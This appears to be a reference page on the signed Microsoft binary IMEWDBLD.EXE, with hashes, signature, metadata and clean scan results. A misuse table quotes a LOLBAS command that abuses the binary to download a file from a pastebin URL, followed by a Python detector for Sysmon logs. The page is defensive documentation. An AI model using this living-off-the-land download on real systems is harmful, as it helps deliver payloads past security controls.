IMEWDBLD.EXE

  • File Path: C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot: IMEWDBLD.EXE

Hashes

Type Hash
MD5 40FBB367D0F83472C170359D6E3446A0
SHA1 C274597DAB07491C3CA8D9863383145771E4EDBB
SHA256 0CFF477B20735E3E56EB8FB1866108362F3FED20E230F07BBC21F8C2D8E13C96
SHA384 030423B6426729A7BE096632F6CF46D4DBA4A8A57E45A8143ADD7380C9C932D6D926F52BE3EC1CB83928AC067A911059
SHA512 E53E7F2379B75755D4617AB13D2DBC60D705D11689763FC0335AB61A3E61330A86488705F4C2B92F2CB1264334243BD8A27027B3240AE477D4327A83129C939D
SSDEEP 6144:vBNjNNnj4mDYaW1rxK4Op4mBNqvcGSvSOkBvGemmq8V7Gs/UEVTppcX+LRe:vBNhNn0881rxK4Op4mB2cGuSOE1V7Gs2
IMP 589AC1368274910A75F86CA227986543
PESHA1 4A1200710DB7A3F462188687A543D4334AFE78CF
PE256 24569DB8E668615F79A19AA6C57282AD259D721EA26E4AD3DF6F88C235D69FD7

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/0cff477b20735e3e56eb8fb1866108362f3fed20e230f07bbc21f8c2d8e13c96/detection

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 33
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 32
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 36
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 35
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 33
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 38

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file; if provided a URL as an argument, it will download the file served at that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" MIT License. © 2018 Red Canary
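
The Sigma rule, LOLBAS entry and Atomic test above describe one chain of evidence: IMEWDBLD.exe started with a URL argument, an outbound connection from that process, and a file landing under INetCache. The following Python is an added example (not code from Strontic, Sigma, LOLBAS or Atomic Red Team) that applies those three checks to Sysmon events and groups the hits per process. It assumes Sysmon field names (Image, CommandLine, Initiated, TargetFilename, ProcessGuid) and the usual Event IDs 1 (process create), 3 (network connection) and 11 (file create); every sample event is constructed, and the dictionary path in the benign event is an invented local filename.

```python
"""Added example: flag IMEWDBLD.exe download abuse in Sysmon telemetry.

Assumptions (not from the page): events are Sysmon records parsed into dicts
with standard Sysmon field names; Event ID 1 = process create, 3 = network
connection, 11 = file create.  All sample events below are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Same test as the Sigma rule on this page: Image|endswith '\IMEWDBLD.exe'
# (case-insensitive, so both the System32 and SysWOW64 copies match).
IMAGE_SUFFIX = "\\imewdbld.exe"
# A URL argument is what turns a dictionary load into a download (per LOLBAS).
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# Cache path named in the LOLBAS entry: ...\INetCache\[IE\]<8 alnum chars>\<file>[1].<ext>
INETCACHE_RE = re.compile(r"\\INetCache\\(?:IE\\)?[A-Za-z0-9]{8}\\[^\\]+\[\d+\]\.", re.IGNORECASE)


def is_imewdbld(image: str) -> bool:
    return image.lower().endswith(IMAGE_SUFFIX)


def evaluate(event: Dict) -> List[str]:
    """Names of the detection rules a single event satisfies."""
    if not is_imewdbld(event.get("Image", "")):
        return []
    hits = []
    eid = event.get("EventID")
    if eid == 1 and URL_RE.search(event.get("CommandLine", "")):
        hits.append("imewdbld_launched_with_url")      # URL given instead of a dictionary path
    if eid == 3 and str(event.get("Initiated", "")).lower() == "true":
        hits.append("net_connection_win_imewdbld")     # the Sigma rule's condition
    if eid == 11 and INETCACHE_RE.search(event.get("TargetFilename", "")):
        hits.append("imewdbld_wrote_inetcache_file")   # downloaded file landed in the cache
    return hits


def correlate(events) -> Dict[str, List[str]]:
    """Rule hits grouped by ProcessGuid so one download shows up as one case."""
    by_proc = defaultdict(list)
    for ev in events:
        for rule in evaluate(ev):
            by_proc[ev.get("ProcessGuid", "?")].append(rule)
    return dict(by_proc)


def triage(events) -> List[Tuple[str, int, str]]:
    """(ProcessGuid, distinct rule count, verdict); two or more rules = high confidence."""
    out = []
    for guid, hits in correlate(events).items():
        distinct = len(set(hits))
        out.append((guid, distinct, "high" if distinct >= 2 else "low"))
    return out


# Constructed sample telemetry (not captured from a real host).
GUID = "{00000000-0000-0000-0000-000000000001}"
IME = "C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": GUID, "Image": IME,
     "CommandLine": IME + " https://example.invalid/raw/dict.txt"},
    {"EventID": 3, "ProcessGuid": GUID, "Image": IME, "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 11, "ProcessGuid": GUID, "Image": IME,
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\AB12CD34\\dict[1].txt"},
    # Benign: a local dictionary path (invented filename), no URL, no network activity.
    {"EventID": 1, "ProcessGuid": "{00000000-0000-0000-0000-000000000002}", "Image": IME,
     "CommandLine": IME + " C:\\Users\\user\\Documents\\custom.dctx"},
    # Unrelated process making a connection: must not match.
    {"EventID": 3, "ProcessGuid": "{00000000-0000-0000-0000-000000000003}",
     "Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true"},
]

if __name__ == "__main__":
    for guid, n, verdict in triage(SAMPLE_EVENTS):
        print(f"{guid}: {n} rule(s) -> {verdict}")
```

A single outbound connection from this binary is already worth an alert on its own, which is all the Sigma rule above requires; the per-process correlation is there to line up the launch, the connection and the cached file for triage, and to keep a local dictionary load (no URL, no connection) from firing.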

MIT License. Copyright (c) 2020-2021 Strontic.